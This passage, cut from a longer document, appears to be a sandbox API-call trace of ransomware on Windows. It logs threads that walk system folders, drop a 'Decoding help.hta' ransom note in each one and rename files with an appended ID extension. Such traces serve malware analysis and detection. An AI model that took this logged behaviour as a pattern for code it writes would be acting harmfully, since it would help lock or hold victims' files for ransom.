returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.308] lstrcmpiW (lpString1="Decoding help.hta", lpString2="item_hover_floating.png") returned -1 [0061.308] lstrlenW (lpString="item_hover_floating.png") returned 23 [0061.309] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.309] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 77 [0061.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="item_hover_floating.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png" [0061.309] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png" [0061.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.986] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x2965fd30 | out: lpFindFileData=0x2965fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba545be6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba545be6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc69969dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="item_hover_flyout.png", cAlternateFileName="")) returned 1 Thread: id = 868 os_tid = 0xae4 [0054.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*.*", lpFindFileData=0x2979fd30 | out: lpFindFileData=0x2979fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5f30 [0056.140] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.140] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x2979fd30 | out: lpFindFileData=0x2979fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.140] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.140] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.140] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x2979fd30 | out: lpFindFileData=0x2979fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0056.140] FindClose (in: hFindFile=0x5a5f30 | out: hFindFile=0x5a5f30) returned 1 Thread: id = 869 os_tid = 0xbe4 [0054.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*", lpFindFileData=0x298dfd30 | out: lpFindFileData=0x298dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa48ceb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6715f0 [0056.763] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.763] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x298dfd30 | out: lpFindFileData=0x298dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa48ceb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.763] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.763] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.763] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x298dfd30 | out: lpFindFileData=0x298dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1106a5b7, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1106a5b7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0056.763] lstrcpyW (in: lpString1=0x10c86800, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*" [0056.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*") returned 73 [0056.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\Decoding help.hta" [0056.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0056.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0058.261] WriteFile (in: hFile=0x308, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x298dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x298dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.261] CloseHandle (hObject=0x308) returned 1 [0058.262] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.262] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.262] lstrlenW (lpString="gadget.xml") returned 10 [0058.262] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*" [0058.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*") returned 73 [0058.262] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml" [0058.262] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml" [0058.262] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.087] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x298dfd30 | out: lpFindFileData=0x298dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1106a5b7, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1106a5b7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 0 [0059.087] FindClose (in: hFindFile=0x6715f0 | out: hFindFile=0x6715f0) returned 1 Thread: id = 870 os_tid = 0xbd0 [0054.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*", lpFindFileData=0x29a1fd30 | out: lpFindFileData=0x29a1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ef0 [0058.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.878] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x29a1fd30 | out: lpFindFileData=0x29a1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.878] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.878] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.878] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x29a1fd30 | out: lpFindFileData=0x29a1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0058.878] FindClose (in: hFindFile=0x5e2ef0 | out: hFindFile=0x5e2ef0) returned 1 Thread: id = 871 os_tid = 0xaf8 [0054.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*", lpFindFileData=0x29b5fd30 | out: lpFindFileData=0x29b5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0058.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.877] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x29b5fd30 | out: lpFindFileData=0x29b5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.877] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.877] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.877] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x29b5fd30 | out: lpFindFileData=0x29b5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0058.877] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 872 os_tid = 0xb10 [0054.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*", lpFindFileData=0x29c9fd30 | out: lpFindFileData=0x29c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc658 [0059.250] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.250] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x29c9fd30 | out: lpFindFileData=0x29c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.250] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.250] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.250] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x29c9fd30 | out: lpFindFileData=0x29c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.250] FindClose (in: hFindFile=0x10fbc658 | out: hFindFile=0x10fbc658) returned 1 Thread: id = 873 os_tid = 0xbc0 [0054.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*", lpFindFileData=0x29ddfd30 | out: lpFindFileData=0x29ddfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0059.245] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.245] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x29ddfd30 | out: lpFindFileData=0x29ddfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.246] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.246] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x29ddfd30 | out: lpFindFileData=0x29ddfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0059.246] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0059.246] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0059.246] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0059.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*" [0059.246] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*") returned 62 [0059.246] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0059.246] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*.*" [0059.246] GlobalMemoryStatus (in: lpBuffer=0x29ddfd10 | out: lpBuffer=0x29ddfd10) [0059.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x252e7f88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0059.247] CloseHandle (hObject=0x5f0) returned 1 [0059.247] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x29ddfd30 | out: lpFindFileData=0x29ddfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0059.247] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 874 os_tid = 0xb1c [0054.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*", lpFindFileData=0x29f1fd30 | out: lpFindFileData=0x29f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b6a8 [0061.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.348] FindNextFileW (in: hFindFile=0x10a4b6a8, lpFindFileData=0x29f1fd30 | out: lpFindFileData=0x29f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.348] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.348] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.348] FindNextFileW (in: hFindFile=0x10a4b6a8, lpFindFileData=0x29f1fd30 | out: lpFindFileData=0x29f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.349] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*" [0061.349] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*.*") returned 67 [0061.349] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\Decoding help.hta" [0061.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\decoding help.hta")) returned 0xffffffff [0061.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft 